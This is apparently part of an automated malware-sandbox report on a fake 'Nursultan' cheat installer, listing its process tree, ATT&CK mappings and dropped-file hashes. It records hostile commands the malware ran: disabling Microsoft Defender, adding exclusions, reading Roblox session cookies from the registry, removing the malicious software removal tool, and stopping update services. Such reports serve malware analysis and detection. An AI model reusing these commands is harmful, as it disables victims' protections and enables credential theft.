        PID:3248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        41⤵
        
        PID:5088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        41⤵
        
        PID:4628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:1592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:3088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        41⤵
        
        PID:3872
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        41⤵
        
        PID:4224
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        41⤵
        
        PID:1036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        41⤵
        Detects videocard installed
        
        PID:4436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        40⤵
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        40⤵
        
        PID:4208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        41⤵
        
        PID:2248
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        41⤵
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        40⤵
        
        PID:3192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        41⤵
        
        PID:3256
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        41⤵
        
        PID:3620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        41⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        41⤵
        
        PID:1780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        41⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        41⤵
        
        PID:5048
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        42⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        41⤵
        
        PID:4628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4584,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4340 /prefetch:8
1⤵
PID:3468

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:1320
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1692
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3024
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:884
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  PID:5104
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4796
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:864
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3920
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1228
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:4988
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1984
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4724
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1844
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:1296

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3304
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1488
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3648
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4812
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1316
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4740
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:4440
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3532
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:5008
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3420
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4176
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1276

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
PID:1880

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4276
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4528
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2212
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4300
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4336
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3864
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5040
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4960
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  PID:2952
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2560
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:4700
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5048
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1108
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3224
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1876

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1288
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:700
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4520
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2876
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1184
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:988
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  PID:3256
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1588
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4548
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:3144
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2432
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:436
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4740

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
PID:3216
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4960
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3164
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5040
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4436
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2924
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:4132
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2144
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:3900
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3408
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2220
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3648
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:536

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
PID:392

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
PID:2388
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:3800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2428
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:828
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2324
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  PID:4016
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1876
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  PID:4480
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3112
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:932
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:536
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:740
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5012
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4640
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4636

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
PID:3112
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2056
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2968
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4068
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  PID:3196
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3968
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5048
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3936
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:220
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1592
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:4260
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2144
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3976
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:5100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CrackLauncher.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Запустить Nursultan.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Filesize
522B

MD5
8334a471a4b492ece225b471b8ad2fc8

SHA1
1cb24640f32d23e8f7800bd0511b7b9c3011d992

SHA256
5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169

SHA512
56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nursultan.exe.log

Filesize
617B

MD5
47504b42411e2c23666d08795adae488

SHA1
92ba780125e2fcedc6223478504aa501adf95c06

SHA256
4b2747d4a45ae359c415f11d2a2d9e09e6a036aad39b40e284850603b64bbc98

SHA512
a2d33cb21ec121b9f857c81df3992da216859f5df69cc8da9edbd91eeb21f45b7ac79459d0c6bc08f09bc33684dfff62a20feddd13d5367ad717095ac85fe9c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
74a6b79d36b4aae8b027a218bc6e1af7

SHA1
0350e46c1df6934903c4820a00b0bc4721779e5f

SHA256
60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

SHA512
60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
feb833699e6ddfc9e9f0c5652683b7cc

SHA1
d333380dcdc0201e0184386bf2c63fb747f411cf

SHA256
2f3365b128e0599f038e03dabf5141bc5182d057690331e45e4146cd41a52daf

SHA512
aae8db01b0678242b006ccdba48c41a49fae2ac879a4c94fff9764db65619b880754be44fee7084a5ff1cf70cda8d77c41b81ba442c9d39f1a92f5795e387cb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1ff7c767b41e57bd6662b9b45b7e4331

SHA1
e484ee08429d6403c5beb97582f2bc88567d2d45

SHA256
c37e94da3e67f9473d2f0f51725c4246eefdbd2c01b3603d1b218842afc05048

SHA512
310cdae4625b1c391eab4adc7e139da6da6cbc2f8eda386ec6aa23da7967fe3dad6792ccd4bed0a0a320c466363051927ff376487080f77b50bf325098651483

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
02c05ea0305ff81a1dcdcf0144d163c4

SHA1
4d0dfaa89ace93c8981325a37a2529536779d329

SHA256
fb9ab3d6f37e071366cb9016d0be7987b8cfd64f13b222159fe7218977d27016

SHA512
9b28f94b689cb3011720a1f026ef458dcee633336d1727743a5d3c52464d4bf6c9f0c2f21b3e30c6fc37de39b772fc1dae4f0f9263d6f1f72426f4a70de1d4df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a7cc007980e419d553568a106210549a

SHA1
c03099706b75071f36c3962fcc60a22f197711e0

SHA256
a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

SHA512
b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
da5c82b0e070047f7377042d08093ff4

SHA1
89d05987cd60828cca516c5c40c18935c35e8bd3

SHA256
77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

SHA512
7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

Download Submit
